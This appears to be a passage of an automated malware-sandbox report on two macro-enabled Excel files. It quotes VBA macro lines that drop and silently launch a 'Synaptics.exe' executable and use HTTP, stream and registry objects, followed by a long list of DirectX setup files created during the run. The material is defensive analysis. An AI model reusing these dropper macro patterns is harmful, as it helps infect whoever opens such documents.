                          Document contains an embedded VBA macro with suspicious strings
                          Source: r4UZcR9I.xlsm.3.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                          Source: r4UZcR9I.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                          Source: r4UZcR9I.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                          Source: r4UZcR9I.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                          Source: r4UZcR9I.xlsm.3.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                          Source: r4UZcR9I.xlsm.3.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                          Source: r4UZcR9I.xlsm.3.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                          Source: r4UZcR9I.xlsm.3.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                          Source: r4UZcR9I.xlsm.3.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                          Source: r4UZcR9I.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                          Source: r4UZcR9I.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                          Source: EOWRVPQCCS.xlsm.3.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                          Source: EOWRVPQCCS.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                          Source: EOWRVPQCCS.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                          Source: EOWRVPQCCS.xlsm.3.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                          Source: EOWRVPQCCS.xlsm.3.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                          Source: EOWRVPQCCS.xlsm.3.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                          Source: EOWRVPQCCS.xlsm.3.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                          Source: EOWRVPQCCS.xlsm.3.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                          Source: EOWRVPQCCS.xlsm.3.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                          Source: EOWRVPQCCS.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                          Source: EOWRVPQCCS.xlsm.3.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                          Document contains an embedded VBA with functions possibly related to ADO stream file operations
                          Source: r4UZcR9I.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                          Source: EOWRVPQCCS.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                          Document contains an embedded VBA with functions possibly related to HTTP operations
                          Source: r4UZcR9I.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                          Source: EOWRVPQCCS.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                          Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
                          Source: r4UZcR9I.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                          Source: EOWRVPQCCS.xlsm.3.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                          Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_0100263F ExitWindowsEx,2_2_0100263F
                          Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_010018B5 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,2_2_010018B5
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\Logs\DirectX.logJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directxJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetupJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\SETFF3.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\SETFF3.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\SET1013.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\directx\websetup\SET1013.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\filelist.datJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS4431D3.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS4431D3.tmp\dxupdate.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\dxupdate.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS4493D8.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS4493D8.tmp\Apr2006_xinput_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Apr2006_xinput_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS449A12.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS449A12.tmp\Apr2006_xinput_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Apr2006_xinput_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS449FCF.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS449FCF.tmp\Aug2006_xinput_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Aug2006_xinput_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS44A55D.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS44A55D.tmp\Aug2006_xinput_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Aug2006_xinput_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS44AABC.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS44AABC.tmp\Dec2006_d3dx10_00_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Dec2006_d3dx10_00_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS44B115.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS44B115.tmp\Dec2006_d3dx10_00_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Dec2006_d3dx10_00_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS44B6F1.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS44B6F1.tmp\Apr2007_xinput_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Apr2007_xinput_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS44BC31.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS44BC31.tmp\Apr2007_xinput_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Apr2007_xinput_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS44C633.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS44C633.tmp\Feb2005_d3dx9_24_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Feb2005_d3dx9_24_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS44CEBF.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS44CEBF.tmp\Apr2005_d3dx9_25_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Apr2005_d3dx9_25_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS44D7E6.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS44D7E6.tmp\Jun2005_d3dx9_26_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Jun2005_d3dx9_26_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS44E014.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS44E014.tmp\Aug2005_d3dx9_27_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Aug2005_d3dx9_27_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS44E851.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS44E851.tmp\Dec2005_d3dx9_28_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Dec2005_d3dx9_28_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS44F0FC.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS44F0FC.tmp\Feb2006_d3dx9_29_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Feb2006_d3dx9_29_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS44F9C6.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS44F9C6.tmp\Apr2006_d3dx9_30_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Apr2006_d3dx9_30_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS4504E2.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS4504E2.tmp\Oct2006_d3dx9_31_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Oct2006_d3dx9_31_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS450DAC.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS450DAC.tmp\Dec2006_d3dx9_32_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Dec2006_d3dx9_32_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS451741.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS451741.tmp\Apr2007_d3dx9_33_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Apr2007_d3dx9_33_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS452153.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS452153.tmp\Apr2007_d3dx10_33_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Apr2007_d3dx10_33_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS4528C5.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS4528C5.tmp\Jun2007_d3dx9_34_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Jun2007_d3dx9_34_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS4532A9.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS4532A9.tmp\Jun2007_d3dx10_34_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Jun2007_d3dx10_34_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS4539AE.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS4539AE.tmp\Aug2007_d3dx9_35_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Aug2007_d3dx9_35_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS4543EF.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS4543EF.tmp\Aug2007_d3dx10_35_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Aug2007_d3dx10_35_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS454B80.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS454B80.tmp\Nov2007_d3dx9_36_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Nov2007_d3dx9_36_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS4555B1.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS4555B1.tmp\Nov2007_d3dx10_36_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Nov2007_d3dx10_36_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS455D62.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS455D62.tmp\Mar2008_d3dx9_37_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Mar2008_d3dx9_37_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS4566A9.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS4566A9.tmp\Mar2008_d3dx10_37_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Mar2008_d3dx10_37_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS456E3B.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS456E3B.tmp\Jun2008_d3dx9_38_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Jun2008_d3dx9_38_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS4577C0.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS4577C0.tmp\Jun2008_d3dx10_38_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Jun2008_d3dx10_38_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS457F71.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS457F71.tmp\Aug2008_d3dx9_39_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Aug2008_d3dx9_39_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS458925.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS458925.tmp\Aug2008_d3dx10_39_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Aug2008_d3dx10_39_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS459098.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS459098.tmp\Nov2008_d3dx9_40_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Nov2008_d3dx9_40_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS459A9A.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS459A9A.tmp\Nov2008_d3dx10_40_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Nov2008_d3dx10_40_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS45A25A.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS45A25A.tmp\Mar2009_d3dx9_41_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Mar2009_d3dx9_41_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS45AC2E.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS45AC2E.tmp\Mar2009_d3dx10_41_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Mar2009_d3dx10_41_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS45B47B.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS45B47B.tmp\Aug2009_d3dx9_42_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Aug2009_d3dx9_42_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS45BBCE.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS45BBCE.tmp\Aug2009_d3dx10_42_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Aug2009_d3dx10_42_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS45C17B.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS45C17B.tmp\Aug2009_d3dx11_42_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Aug2009_d3dx11_42_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS45C6EA.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS45C6EA.tmp\Aug2009_d3dcsx_42_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Aug2009_d3dcsx_42_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS45D83F.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS45D83F.tmp\Aug2009_D3DCompiler_42_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Aug2009_D3DCompiler_42_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS45DFF0.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS45DFF0.tmp\Jun2010_d3dx9_43_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Jun2010_d3dx9_43_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS45E7A1.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS45E7A1.tmp\Jun2010_d3dx10_43_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Jun2010_d3dx10_43_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS45ED6D.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS45ED6D.tmp\Jun2010_d3dx11_43_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Jun2010_d3dx11_43_x86.cabJump to behavior
